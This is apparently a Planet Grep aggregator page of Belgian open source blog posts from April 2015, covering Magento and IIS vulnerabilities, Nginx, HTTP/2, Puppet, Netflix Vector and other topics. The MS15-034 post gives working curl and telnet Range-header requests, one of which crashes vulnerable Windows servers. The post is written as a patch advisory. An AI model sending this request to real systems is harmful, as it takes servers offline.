Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

April 21, 2015

Dieter Adriaenssens

Gorges du Tarn 2015

It was an amazing week, climbing in Gorges du Tarn with Bleau Climbing team during the second week of the Easter holiday.
Beautiful weather, nice people, good atmosphere, a lot of climbing, some personal bests and climbing improvements on both a physical and mental level.

Some impressions:

Great trip, looking forward to the next one!

by Dieter Adriaenssens at April 21, 2015 01:03 PM

Mattias Geniar

Magento eCommerce PHP Remote Code Execution


The fun just never ends. A remote code execution exploit was found on February 9th, 2015.

Checkpoint released a blogpost yesterday with more details on that particular vulnerability.

Check Point researchers recently discovered a critical RCE (remote code execution) vulnerability in the Magento web e-commerce platform that can lead to the complete compromise of any Magento-based store, including credit card information as well as other financial and personal data, affecting nearly two hundred thousand online shops.
Analyzing the Magento Vulnerability

The patch for the Remote Code Execution vulnerability is available on the Magento site: Magento Downloads, patch SUPEE-5344.


Magento's Open Source Community Policy

One very annoying part of the Open Source edition of Magento is that the downloads available on the site do not contain the patches yet. You have to download the latest release, and then still download and apply every patch available.

It's very common for users to just download the latest release, thinking that it should be the up-to-date one, patches included. It boggles my mind why Magento would willingly distribute unsafe code this way, assuming users will figure out on their own that they need to download the patches separately.

Added to that is the fact that version numbers don't increase when the patches are applied. Seriously, it's 2015, Magento, get your act together. This is a very lame tactic to force your users to consider the commercially supported version.

The patch

If you're wondering whether you should apply the patch to your Magento installation or not, let me answer that with a very clear yes:

The vulnerability is actually comprised of a chain of several vulnerabilities that ultimately allow an unauthenticated attacker to execute PHP code on the web server.

Since the patch is behind a very annoying login-wall, I've mirrored it here:

The patch contains a bunch of whitespace changes, but the actual fix is this:

--- app/code/core/Mage/Admin/Model/Observer.php
+++ app/code/core/Mage/Admin/Model/Observer.php
@@ -43,6 +43,10 @@ class Mage_Admin_Model_Observer
         $session = Mage::getSingleton('admin/session');
         /** @var $session Mage_Admin_Model_Session */
+        /**
+         * @var $request Mage_Core_Controller_Request_Http
+         */
         $request = Mage::app()->getRequest();
         $user = $session->getUser();
@@ -56,7 +60,7 @@ class Mage_Admin_Model_Observer
         if (in_array($requestedActionName, $openActions)) {
         } else {
-            if($user) {
+            if ($user) {
             if (!$user || !$user->getId()) {
@@ -67,13 +71,14 @@ class Mage_Admin_Model_Observer
                     $user = $session->login($username, $password, $request);
                     $request->setPost('login', null);
-                if (!$request->getParam('forwarded')) {
+                if (!$request->getInternallyForwarded()) {
+                    $request->setInternallyForwarded();
                     if ($request->getParam('isIframe')) {
                         $request->setParam('forwarded', true)
-                    } elseif($request->getParam('isAjax')) {
+                    } elseif ($request->getParam('isAjax')) {
                         $request->setParam('forwarded', true)
diff --git app/code/core/Mage/Core/Controller/Request/Http.php app/code/core/Mage/Core/Controller/Request/Http.php
index 368f392..123e89e 100644
--- app/code/core/Mage/Core/Controller/Request/Http.php
+++ app/code/core/Mage/Core/Controller/Request/Http.php
@@ -76,6 +76,13 @@ class Mage_Core_Controller_Request_Http extends Zend_Controller_Request_Http
     protected $_beforeForwardInfo = array();
+    /**
+     * Flag for recognizing if request internally forwarded
+     *
+     * @var bool
+     */
+    protected $_internallyForwarded = false;
+    /**
      * Returns ORIGINAL_PATH_INFO.
      * This value is calculated instead of reading PATH_INFO
      * directly from $_SERVER due to cross-platform differences.
@@ -530,4 +537,27 @@ class Mage_Core_Controller_Request_Http extends Zend_Controller_Request_Http
         return false;
+    /**
+     * Define that request was forwarded internally
+     *
+     * @param boolean $flag
+     * @return Mage_Core_Controller_Request_Http
+     */
+    public function setInternallyForwarded($flag = true)
+    {
+        $this->_internallyForwarded = (bool)$flag;
+        return $this;
+    }
+    /**
+     * Checks if request was forwarded internally
+     *
+     * @return bool
+     */
+    public function getInternallyForwarded()
+    {
+        return $this->_internallyForwarded;
+    }
diff --git lib/Varien/Db/Adapter/Pdo/Mysql.php lib/Varien/Db/Adapter/Pdo/Mysql.php
index 7b903df..a688695 100644
--- lib/Varien/Db/Adapter/Pdo/Mysql.php
+++ lib/Varien/Db/Adapter/Pdo/Mysql.php
@@ -2651,10 +2651,6 @@ class Varien_Db_Adapter_Pdo_Mysql extends Zend_Db_Adapter_Pdo_Mysql implements V
         $query = '';
         if (is_array($condition)) {
-            if (isset($condition['field_expr'])) {
-                $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
-                unset($condition['field_expr']);
-            }
             $key = key(array_intersect_key($condition, $conditionKeyMap));
             if (isset($condition['from']) || isset($condition['to'])) {

Please patch!


by Mattias Geniar at April 21, 2015 09:33 AM

April 20, 2015

Mattias Geniar

Nginx Open Sources TCP Load Balancing


A move we can only applaud.

Stream: port from NGINX+.

diffstat 20 files changed, 6079 insertions(+), 2 deletions(-) [+]
Changeset commit: changeset 6115:61d7ae76647d

A cryptic commit message for anyone who doesn't follow Nginx. But here's what it means: the TCP load balancing present in Nginx+ is now available in Nginx Open Source.

This kind of load balancing was reserved for paying Nginx+ customers, until now.

TCP Load Balancing

NGINX Plus terminates TCP connections, makes a load-balancing decision and then establishes a connection to the upstream server, relaying data between the client and server on demand. NGINX Plus delivers high availability using inline and synthetic health checks, slow-start for recovered servers, concurrency control, and the ability to designate servers as active, backup, or down.

Nginx+ Load Balancing

TCP load balancing allows setups to remove HAProxy, or an alternative TCP load balancer, and use Nginx for all of it. Previously, Nginx could load balance HTTP, POP3 and IMAP traffic, but always within those protocols. Now, it will support native TCP connections as well.
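For reference, a minimal configuration for this looks roughly like the sketch below. This assumes the open source port keeps the stream syntax documented for Nginx+; the backend addresses are placeholders of mine:

```nginx
# Minimal sketch of the stream module syntax (assumption: the open source
# port keeps the Nginx+ syntax; addresses below are placeholders).
stream {
    upstream backend_mysql {
        server;
        server;
    }

    server {
        listen 3306;               # accept raw TCP connections
        proxy_pass backend_mysql;  # relay them to the upstream group
    }
}
```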

More info on the TCP load balancing in Nginx+ can be found on the announcement of Nginx R6: Announcing NGINX Plus Release 6 with Enhanced Load Balancing.

A great move to make this Open Source, can't wait to see this made available in their RPM and DEB packages.

Would I be too optimistic in hoping that the Nginx+ Application Health Checks would also be ported into Nginx Open Source? Because that would be awesome, and would eliminate Varnish as an advanced health-check proxy for backends in some of my configs.


by Mattias Geniar at April 20, 2015 04:22 PM

April 19, 2015

Wouter Verhelst

Youn Sun Nah 5tet: Light For The People

About a decade ago, I played in the (now defunct) "Jozef Pauly ensemble", a flute choir connected to the musical academy where I was taught to play the flute. At the time, this ensemble had the habit of going on summer trips every year; sometimes these trips were large international concert tours (like our 2001 trip to Australia), but that wasn't always the case; there have also been smaller trips, like the 2002 one to the French Ardennes.

While there, we went on a day trip to the city of Reims. As a city close to the front in the first world war, it has a museum dedicated to that subject that I remembered going to. But the fondest memory of that day was going to a park where a podium was set up, with a few stacks of fold-up chairs standing nearby. I took one and listened to the music.

That was the day when I realized that I kind of like jazz. I had come into contact with Jazz before, but it had always been something to be used as a kind of musical wallpaper; something you put on, but don't consciously listen to. Watching this woman sing, however, was a different kind of experience altogether. I'm still very fond of her rendition of "Besame Mucho".

After having listened to the concert for about two hours, they called it quits, but did tell us that there was a record which you could buy. Of course, after having enjoyed the afternoon so much, I couldn't imagine not buying it, so that happened.

Fast forward several years: in the move from my apartment above my then-office to my current apartment (just around the corner), the record got put into the wrong box, and when I unpacked things again it got lost; permanently, I thought. Since I also hadn't digitized it yet at the time, I hadn't listened to it in quite a while.

But that time came to an end today. The record I thought I'd lost wasn't lost at all; it was just in a weird place, and while cleaning yesterday, I found it sitting among a bunch of old stuff that I was going to throw out. Putting on the record today made me realize again how good it really is, and I thought that I might want to see if she was still active, and if she might perhaps have made another album.

It was great to find out that not only had she made six more albums since the one I bought, she'd also become a lot more known in the Jazz world (which I must admit I don't really follow all that well), and won a number of awards.

At the time, Youn Sun Nah was just a (fairly) recent graduate from a particular Jazz school in Paris. Today, she appears to be so much more...

April 19, 2015 09:25 AM

April 17, 2015

Mattias Geniar

Double-clicking On The Web


Here's a usability feature for the web: disable double-clicks on links and form submits.

Before you think I'm a complete idiot, allow me to talk some sense into the idea.

The Double-click Outside The Web

Everywhere in the Operating System, whether it's Windows or Mac OSX, the default behaviour to navigate between directories is by double-clicking them. We're trained to double-click anything.

Want to open an application? Double-click the icon. Want to open an e-mail in your mail client? Double-click the subject. Double-clicks everywhere.

Except on the web. The web is a single-click place.

Double The Click, Twice The Fun

We know we should only single-click a link. We know we should only click a form submit once. But sometimes, we double-click. Not because we do so intentionally, but because our brains are just hardwired to double-click everything.

For techies like us, a double-click happens by accident. It's an automated double-click, one we don't really think about. One we didn't mean to do.

For lesser-techies, also known as the common man or woman, double-clicks happen all the time. The user doesn't have a technical background, so they don't know the web works with single-clicks. Or perhaps they do, and don't see the harm in double-clicking.

But default browser behaviour is to accept user input. However foolish it may be.

If you accidentally double-click a form submit, you submit it twice. It's that simple.

- - [18/Apr/2015:00:37:06 +0400] "POST /index.php HTTP/1.1" 200 0
- - [18/Apr/2015:00:37:07 +0400] "POST /index.php HTTP/1.1" 200 0

If you double-click a link, it opens twice.

- - [18/Apr/2015:00:37:06 +0400] "GET /index.php HTTP/1.1" 200 9105
- - [18/Apr/2015:00:37:07 +0400] "GET /index.php HTTP/1.1" 200 9104

The problem is sort of solved with fast servers. If the page loads fast enough, the next page may already be downloading/rendering, so the second click of that double-click is hitting some kind of void, the limbo in between the current and the next page.

For slower servers, that just take more time to generate a response, a double-click would still happen and re-submit or re-open a link.


I recently filed a feature request with our devs for a similar problem.

If you accidentally (and we've all done this) double-click a form submit, you submit it twice. That means whatever action was requested, is executed by the server twice.

The client-side fix is relatively simple: disable the form's submit button once the first submit has been registered. A simple jQuery snippet can solve this for you.

        $('form').on('submit', function () {
            var form = $(this);
            // Give the first submit a moment to fire, then block any further
            // submits of this form.
            setTimeout(function () {
                form.find('input[type=submit], button[type=submit]').prop('disabled', true);
            }, 50);
        });

Server-side, a fix could be to implement some kind of rate limiting or double-submit protection within a particular timeframe, but that's a much harder problem to solve.
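As a sketch of the server-side direction, one common approach is a one-time form token: the server issues a token with each rendered form and rejects any submit whose token it has already seen. The names below are illustrative, not from any particular framework:

```javascript
// One-time form tokens as double-submit protection (illustrative sketch).
const seenTokens = new Set();

// Issued alongside the rendered form (hypothetical helper).
function issueToken() {
  return Math.random().toString(36).slice(2);
}

// Called on every POST: only the first submit with a given token passes.
function acceptSubmit(token) {
  if (seenTokens.has(token)) {
    return false; // duplicate submit, e.g. an accidental double-click
  }
  seenTokens.add(token);
  return true;
}
```

The token store needs expiry in a real deployment, which is exactly why the server-side fix is the harder one.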

It's 2015, why is this even a thing to consider?

Proposed Solution

I cannot think of a single reason why something like a form submit should be executed twice as the result of a double-click.

For a slow-responding server, it's reasonable for a user to hit submit again after more than a few seconds have passed without feedback. Without visual feedback that the request is still being processed, the user comes to expect that the form submit did not work.

So the user submits again, thinking they must have made a mistake on the first attempt. But if the same form submit is registered by the browser within less than 2 seconds, surely that must have been a mistake and should count as an accidental double-click?

Why should every web service implement a double-click protection, either client-side or server-side, and reinvent the wheel? Wouldn't this make for a great browser feature?

What if a double-click is blocked by default, and can be enabled again by setting a new attribute on the form?

<form action="/something.php" allowmultiplesubmits>

Setting the allowmultiplesubmits attribute would cause the browser to allow multiple submits of the same form on the same page; by default, the browser would apply some kind of flood/repeat/double-click protection to prevent this.
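A sketch of how such browser behaviour could work, with the decision logic kept separate. allowmultiplesubmits is the hypothetical attribute from above, and the 2-second window is an assumption borrowed from the earlier paragraph:

```javascript
// Decide whether a submit should be treated as an accidental double-click.
// lastSubmitMs is the timestamp of the previous submit of this form, or null.
function shouldBlockSubmit(lastSubmitMs, nowMs, allowMultiple) {
  if (allowMultiple) return false;         // form opted out via the attribute
  if (lastSubmitMs === null) return false; // the first submit always passes
  return nowMs - lastSubmitMs < 2000;      // <2s apart: assume a double-click
}

// Browser wiring (illustrative only):
// document.querySelectorAll('form').forEach(function (form) {
//   var last = null;
//   form.addEventListener('submit', function (e) {
//     var allow = form.hasAttribute('allowmultiplesubmits');
//     if (shouldBlockSubmit(last,, allow)) e.preventDefault();
//     else last =;
//   });
// });
```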

Maybe I'm overthinking it and this isn't an issue. But anyone who's active on the web has, at one point, accidentally double-clicked. And I think we've got all the technology available to fix that, once and for all.


by Mattias Geniar at April 17, 2015 08:52 PM

Philip Van Hoof

The zoo: birth control versus slaughter

Michel Vandenbosch versus Dirk Draulans: I was once a vegetarian for some 15 years, and today I'm pleased with this well-prepared and nicely balanced debate. My thanks to the editors of Terzake.

I agreed with both gentlemen. That is what made this a worthy philosophical discussion: birth control versus feeding surplus animals to the lions, plus the use and purpose of well-run zoos. That use is clear to me: education for foolish man (his children, in the hope that the next generation will be less foolish).

Although I agreed with both, I'm currently more in favour of feeding surplus animals to the lions than of birth control for animal species, endangered or not. That, with great respect for Vandenbosch's position, seemed to me to be Draulans' standpoint. Ethically, I understood Vandenbosch too: isn't it better to practice birth control in order to avoid the suffering of a slaughter?

I choose Draulans' standpoint because it mimics the real world most closely. I also think it was very good that the zoo showed the slaughter of the giraffe to the children. Because this is reality. Our children must see reality. We must model reality with our minds. No euphemisms such as calling the killing of a giraffe euthanasia. Let us raise our children with reality.

by admin at April 17, 2015 07:40 PM

Frank Goossens

XKCD on Code Quality

I honestly didn't think you could even USE emoji in variable names. Or that there were so many different crying ones.

What’s that style guide?

by frank at April 17, 2015 05:01 AM

April 16, 2015

Mattias Geniar

HTTP/1 vs HTTP/2 Page Loading


An interesting proof-of-concept:

Especially with simulated latency, HTTP/2 shows its true potential.

HTTP/1: 31s to load

Loading happens in clear concurrency blocks of 6 assets each.


30 seconds later


And done, after a whopping 31 seconds.

HTTP/2: 1.7s to load

Concurrency shows its power here. Assets are loaded over a single multiplexed TCP stream.


1.5 seconds later


These results are in line with my earlier testing on HTTP/2;

Despite all the hate HTTP/2 seems to be receiving, some benchmarks just don't lie.


by Mattias Geniar at April 16, 2015 03:50 PM

Open Source Puppet 4 Released


And it looks like a great release, too.

Thanks to your valuable feedback, we’ve completely rewritten the parser and evaluator, ironed out some kinks, and learned how these changes interacted with all of the Puppet manifests already out in the wild.

In short, the future parser is no longer in the realm of the future. It’s here, and available by default. Also, the enhanced Puppet language delivers more power and greater reliability with smarter, more compact, code that is more human readable than ever before.
Say Hello to Open Source Puppet 4!

I'm also glad to read that one of my "lessons learned in Puppet" horror stories of sudden major-version upgrades is being tackled with Puppet Collections.

Puppet Collections is the new way Puppet Labs will deliver Open Source Puppet to users. A Puppet Collection is a package repository whose contents we guarantee will work together — think of it like a Linux distribution, but for Puppet-related packages. This should provide a few significant improvements over our past layouts on package servers.

Each collection will be opt-in, so if you’re running ensure => latest, you’ll get the latest in the collection you’re using.
Puppet Collections

The versioning is a bit strange, but I'll be able to live with that.

Collections are numbered with integers. The first one is Puppet Collection 1 (PC1) the next will be 2, and so on. The numbers have no significance other than PC2 is newer than PC1, etc.

Nice work Puppet Labs, I'm happy to see Puppet 4 out and released!


by Mattias Geniar at April 16, 2015 09:19 AM

Frank Goossens

Celebrating 300000 Autoptimize downloads with new release

300k-1, that is. So just now Autoptimize passed the 300,000 downloads mark (6 months after reaching 200K), which feels huge to me. To celebrate I just pushed out version 1.9.3, which features, as befits a minor release, small improvements and bugfixes. From the changelog:

So there you have your present, now go unwrap it! Have fun! :-)

by frank at April 16, 2015 08:37 AM

April 15, 2015

Damien Sandras

Be IP is hiring!

In case some readers of this blog would be interested in working with Open Source software and VoIP technologies, Be IP ( is hiring a developer. Please see for the job description. You can contact me directly.

by Damien Sandras at April 15, 2015 09:58 AM

Mattias Geniar

Remote Code Execution Via HTTP Request In IIS On Windows


Patching time.

A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.

To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.

Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.

More details: MS15-034
This vulnerability has been assigned a CVE: CVE-2015-1635

Update: exploit code is emerging

The first snippets of exploit code for MS15-034 are starting to show up, to scan for the vulnerability of a system.

/* The Range upper bound, 18446744073709551615, is 2^64-1: the maximum unsigned 64-bit value. */
char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";


Detecting If You're Vulnerable

This remote scan is using the Range-header to trigger a buffer overflow and detect if the system is vulnerable or not.

$ telnet 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

The following curl command would mimic the same request.

$ curl -v -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

You should get a response saying "HTTP Error 400. The request has an invalid header name." Anything else as a response, and your system may still be vulnerable.

The HTTP 'Ping Of Death' Request

The vulnerability allows for a Denial of Service in the form of a blue screen. It's nearly the same request as the check command above, but the range is different: Range: bytes=20-18446744073709551615.

$ curl -v -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"

A vulnerable Windows machine would get the request, roll over and die.

The Range attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (Dutch blogpost with more details).

When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.

The CVE and Microsoft Bulletin mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.


by Mattias Geniar at April 15, 2015 06:55 AM

Frank Goossens

Music from Monsieur Garnier: Acid Mondays

I still have some old Gilles Peterson “WorldWide” and Laurent Garnier “It is what it is” shows on my computer and once in a while I still “discover” gems in them. Just now, while on the train, I was listening to “It is what it is” Saison Quatre, emission 2 and heard “El Recorrido” by Acid Mondays. The track starts out with just a (very) fat groove, but gets really interesting as from 2:37.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ain’t it funky now?

by frank at April 15, 2015 06:21 AM

April 14, 2015

Claudio Ramirez

Post-it: PROXIMUS_AUTO_FON and TelenetWifree (Belgium) from GNU/Linux (or Windows 7)


The Belgian ISPs Proximus and Telenet both provide access to a network of hotspots. A nice recent addition is the use of alternative SSIDs for “automatic” connections, instead of a captive portal where you log in through a webpage. Sadly, their support pages provide next to no information on how to make a safe connection to these hotspots.

Proximus is a terrible offender. According to their support page, on a PC only Windows 8.1 is supported. Linux, OSX *and* Windows 8 (!) or 7 users are kindly encouraged to use the open wifi connection and log in through the captive portal. Oh, and no certificate information is given for Windows 8.1 either. That’s pretty silly, as they use EAP-TTLS. Here is the setup to connect from whatever OS you use (terminology from gnome-network-manager):

Security: WPA2 Enterprise
Authentication: Tunneled TLS (TTLS)
Anonymous identity:
Certificate: GlobalSign Root CA (in Debian/Ubuntu in /usr/share/ca-certificates/mozilla/)
Inner Authentication: MSCHAPv2
Password: your_password_here
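For setups without NetworkManager, the same settings translate to a wpa_supplicant network block along these lines. This is a sketch: the certificate file name and path may differ per distribution, and the credentials are placeholders:

```
network={
    ssid="PROXIMUS_AUTO_FON"
    key_mgmt=WPA-EAP
    eap=TTLS
    phase2="auth=MSCHAPV2"
    ca_cert="/usr/share/ca-certificates/mozilla/GlobalSign_Root_CA.crt"
    identity="your_login_here"
    password="your_password_here"
}
```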

Telenet’s support page is slightly better (not a fake Windows 8.1 restriction), but pretty useless as well with no certificate information whatsoever. Here is the information needed to use TelenetWifree using PEAP:

SSID: TelenetWifree
Security: WPA2 Enterprise
Authentication: Protected EAP (PEAP)
Certificate: GlobalSign Root CA (in Debian/Ubuntu in /usr/share/ca-certificates/mozilla/)
Inner Authentication: MSCHAPv2
Password: your_password_here
Radius server certificate (optional):

If you’re interested, screenshots of the relevant parts of the wireshark traceare attached here:

proximus_rootca telenet_rootca

Filed under: Uncategorized Tagged: GNU/Linux, Lazy support, proximus, PROXIMUS_AUTO_PHONE, telenet, TelenetWifree, Windows 7

by claudio at April 14, 2015 08:51 PM

Mattias Geniar

Taking Netflix’s Vector (Performance Monitoring Tool) For A Spin


Yet another fine piece of open source software coming from Netflix (like CPU Flame Graphs).

Vector is an open source host-level performance monitoring framework, which exposes hand-picked, high-resolution system and application metrics to every engineer’s browser.


Previously, we'd login to instances as needed, run a variety of commands, and sift through the output for the metrics that matter. Vector cuts down the time to get to those metrics, helping us respond to incidents more quickly.
Netflix Techblog

Let's take it for a spin!

Running the web frontend

A few caveats before you can run it: Vector requires Bower to install dependencies and, optionally, Gulp for running the tasks; two tools mostly found on developer machines, not on servers. However, if you package it in your own RPM/DEB, that shouldn't be an issue anymore.

To avoid the installation on the server, you would run Vector on your local machine, and have it remotely connect to a PCP endpoint. More on that later.

If you're running on a Fedora based system (Fedora, Red Hat, CentOS, ...), use the following commands.

$ yum install nodejs npm
$ npm install -g bower
$ npm install -g gulp

If you're running it on Mac OSX, make sure you have Brew (a package manager) installed, and run the following commands.

$ brew install npm
$ npm install -g bower
$ npm install -g gulp

Now that you've got the preparations all done, download & run the Vector tool.

$ git clone
$ cd vector/
$ bower install
$ cd app/
$ python -m SimpleHTTPServer 8080

The last command starts a simple Python HTTP server on port 8080. Browse to http://localhost:8080/ to start the app.

Running Performance Co-Pilot (PCP)

Vector uses the PCP framework for collecting host metrics, so that service needs to be running.

$ yum install pcp pcp-webapi
$ service pcp start
$ service pmwebd start

Afterwards, the Vector tool will connect directly to the pcp-webapi port (:44323), so make sure it's firewalled! There's no authentication needed by default (but it's available, if you want it).

$ netstat -anp | grep ':44323'
tcp        0      0*   LISTEN      8970/pmwebd
tcp        0      0 :::44323          :::*        LISTEN      8970/pmwebd

In this regard, running Vector with PCP is similar to running Kibana, a client-side frontend that connects directly to an Elasticsearch instance.

This modus operandi of having a client-side interface to a remote endpoint is ideal for running the Vector tool locally (on your laptop, mac, ...), and having it connect to a remote PCP endpoint, that's running on each of your hosts.

No need to run the WebUI on any server!

A downside of running PCP on RHEL/CentOS systems: the PCP version currently supplied in the EPEL repos is 3.9.4. The version you need is ... 3.10. So, bummer.

That leaves you with 2 options: try the RPM packages supplied by PCP themselves or compile from source. If you're going to compile from source, have a look at the RPM build steps in the PCP Vagrantfile, it has step-by-step instructions on compiling PCP from source and creating RPM/DEB files via ./Makepkgs.

It also requires a truckload of devel-dependencies, if you're compiling from source. These should be the full steps.

$ git clone
$ cd pcp
$ yum -y groupinstall 'Development Tools'
$ yum -y install git ncurses-devel readline-devel man libmicrohttpd-devel qt4-devel \
  python26 python26-devel perl-JSON sysstat perl-TimeDate \
  perl-XML-TokeParser perl-ExtUtils-MakeMaker perl-Time-HiRes \
  systemd-devel bc cairo-devel cyrus-sasl-devel \
  systemd-devel libibumad-devel libibmad-devel papi-devel libpfm-devel \
  rpm-devel perl-Spreadsheet-WriteExcel perl-Text-CSV_XS bind-utils httpd \
  python-devel nspr-devel nss-devel python-ctypes nss-tools \
  perl-Spreadsheet-XLSX ed cpan valgrind time xdpyinfo rrdtool-perl
$ env PYTHON=python2.6 ./Makepkgs
$ rpm -ivh  pcp-*/build/rpm/*.rpm
Preparing...                ########################################### [100%]
   1:pcp-conf               ########################################### [  4%]
   2:pcp-libs               ########################################### [  9%]
   3:perl-PCP-PMDA          ########################################### [ 13%]
   4:python-pcp             ########################################### [ 17%]
   5:pcp                    ########################################### [ 22%]
Rebuilding PMNS ...
Starting pmcd ...
Starting pmlogger ...
Starting pmie ...
Starting pmproxy ...
   6:perl-PCP-LogImport     ########################################### [ 26%]
   7:pcp-libs-devel         ########################################### [ 30%]
   8:pcp-testsuite          ########################################### [ 35%]
   9:pcp-import-ganglia2pcp ########################################### [ 39%]
  10:pcp-import-iostat2pcp  ########################################### [ 43%]
  11:pcp-import-mrtg2pcp    ########################################### [ 48%]
  12:pcp-import-sar2pcp     ########################################### [ 52%]
  13:pcp-import-sheet2pcp   ########################################### [ 57%]
  14:pcp-gui                ########################################### [ 61%]
  15:pcp-manager            ########################################### [ 65%]
Starting pmmgr ...
  16:pcp-pmda-infiniband    ########################################### [ 70%]
  17:pcp-pmda-papi          ########################################### [ 74%]
  18:perl-PCP-LogSummary    ########################################### [ 78%]
  19:perl-PCP-MMV           ########################################### [ 83%]
  20:pcp-import-collectl2pcp########################################### [ 87%]
  21:pcp-webapi             ########################################### [ 91%]
Starting pmwebd ...
  22:pcp-doc                ########################################### [ 96%]
  23:pcp-debuginfo          ########################################### [100%]
  24:pcp                    ########################################### [104%]

Once you've got the latest version of PCP running, the PCP web API will work.

$ service pmcd restart
$ service pmwebd restart

What's really cool is the short interval you have for gathering statistics. Similar to statsd, but without having to determine your own keys and items first.

What it looks like

Here's the default Dashboard as soon as you load the webapp. Click on each screenshot for a bigger version.




The current version of Vector has graphs for 4 major areas of the OS: Network, Disk, Memory & CPU.









Next steps

Their blogpost announcement hints at a few interesting "next steps" for the project. I particularly like the idea of having CPU Flame Graphs in an easily accessible UI!

The overhead of running PCP seems minimal, so this may just become an additional tool for our managed hosting clients: more fine-grained access to monitoring stats in a good-looking WebUI for ad-hoc debugging. Sounds good to me!

Vector is definitely a tool to keep an eye on. You can follow the development process on GitHub.

The post Taking Netflix’s Vector (Performance Monitoring Tool) For A Spin appeared first on

by Mattias Geniar at April 14, 2015 06:47 PM

Nginx HTTP/2 Support Coming Late 2015

The post Nginx HTTP/2 Support Coming Late 2015 appeared first on

As anticipated.

We’re pleased to announce that we plan to release versions of NGINX Open Source and NGINX Plus by the end of 2015 that will include support for HTTP/2. blog

Now you've got a clear milestone for your HTTP/2 support on your website(s).

The post Nginx HTTP/2 Support Coming Late 2015 appeared first on

by Mattias Geniar at April 14, 2015 06:14 PM

Nginx Getting JavaScript Scripting Engine

The post Nginx Getting JavaScript Scripting Engine appeared first on

I missed the original hint in October 2014, so this came as a surprise to me.

Also, eventually, JavaScript can be used as [an] application language for Nginx. Currently we have only Perl and Lua [supported in Nginx]. Perl is our own model, and Lua is a third-party model.


We're planning JavaScript configurations, using JavaScript in [an] Nginx configuration. We plan to be more efficient on these [configurations], and we plan to develop a flexible application platform. You can use JavaScript snippets inside configurations to allow more flexible handling of requests, to filter responses, to modify responses. Also,

It seems Nginx is evolving into a bigger and bigger beast. I'm not yet sure what to think of JavaScript as a scripting language next to Lua in Nginx. At first sight, it looks like overkill, like it's turning Nginx from the lean, mean HTTP-serving machine into a more bloated application server.

At the same time, it always struck me as odd that Nginx had a POP3 and IMAP proxy.

Maybe I'm just missing the vast amount of users that use Nginx as a TCP load balancer instead of just an HTTP web server?

The post Nginx Getting JavaScript Scripting Engine appeared first on

by Mattias Geniar at April 14, 2015 06:11 PM

Frederic Hornain

[Fedora 21 Docker Base Image] Download



Fedora 21 Official Docker Base Images can be found at the following URL:

You can easily load this Docker image into your running Docker daemon using the command:
docker load -i Fedora-Docker-Base-20141203-21.x86_64.tar.gz

Kind Regards


by Frederic Hornain at April 14, 2015 04:51 PM

Mattias Geniar

Varnish Cache 3.0 Is End Of Life

The post Varnish Cache 3.0 Is End Of Life appeared first on

A year after the release of Varnish 4, version 3.0 has been declared end-of-life.

A year has passed since the release of Varnish Cache 4.0.0.

According to our normal release schedule for Varnish Cache, this means
that the previous stable version will stop receiving regular

As of April 10th 2015, Varnish Cache 3.0 reached end of life (EOL) status.

Please use this opportunity to upgrade to Varnish Cache 4.0.

For paying Varnish Plus customers we'll support Varnish Cache 3.0 and
Varnish Cache Plus 3.0 for at least another year. Please contact me
directly if you have any questions in this regard.
varnish-announce mailing list

Seems fast. I must have missed the warning signals that Varnish 3.0 would be reaching end of life.

If you're looking at upgrading to Varnish 4, here are a few useful links;

Either way, it's time to take the upgrade to Varnish 4.0 seriously.

The post Varnish Cache 3.0 Is End Of Life appeared first on

by Mattias Geniar at April 14, 2015 11:18 AM

Frederic Hornain

[Devoxx France 2015] Optaplanner Session



Here is the presentation “OptaPlanner ou comment optimiser les itinéraires, les plannings et bien plus encore…” (“OptaPlanner, or how to optimize routes, schedules and much more…”) that Geoffrey and I gave at Devoxx France on Friday, April 10 2015.

BTW, slides are in French


Optaplanner presentation @ Devoxx

N.B. : Only Chrome, Safari, Firefox, Opera and IE10-11 are supported

What is OptaPlanner?

OptaPlanner is a constraint satisfaction solver. It optimizes business resource planning. Every organization faces scheduling puzzles: assign a limited set of constrained resources (employees, assets, time and money) to provide products or services to customers. OptaPlanner optimizes such planning problems to do more business with less resources. Use cases include Vehicle Routing, Employee Rostering, Job Scheduling, Bin Packing and many more.

More information at

Optaplanner and CDI guys


Kind Regards



by Frederic Hornain at April 14, 2015 07:57 AM

April 13, 2015

Mattias Geniar

Linux Kernel 4.0

The post Linux Kernel 4.0 appeared first on

It's alive!

With one simple commit, the Release Candidate flag is removed and the 4.0 kernel is officially released. Unfortunately, there isn't much spectacle in this release.

Feature-wise, 4.0 doesn't have all that much special. Much have been
made of the new kernel patching infrastructure, but realistically,
that not only wasn't the reason for the version number change, we've
had much bigger changes in other versions. So this is very much a
"solid code progress" release.
Linus "we're all sheep" Torvalds

One interesting part is the decision to name this a 4.0 release. Then again, if you remember PHP6, version numbers really are just numbers, nothing special.

There is also a hint to a bigger release in 4.1 in the announcement.

[...] But we've definitely had bigger releases (and
judging by linux-next v4.1 is going to be one of the bigger ones).
Linus "we're all sheep" Torvalds

Give us a few years, and we'll be rocking the 4.0+ kernel in a modern Linux Distro. ;-)

The post Linux Kernel 4.0 appeared first on

by Mattias Geniar at April 13, 2015 04:32 PM

Dries Buytaert

Skiing in France

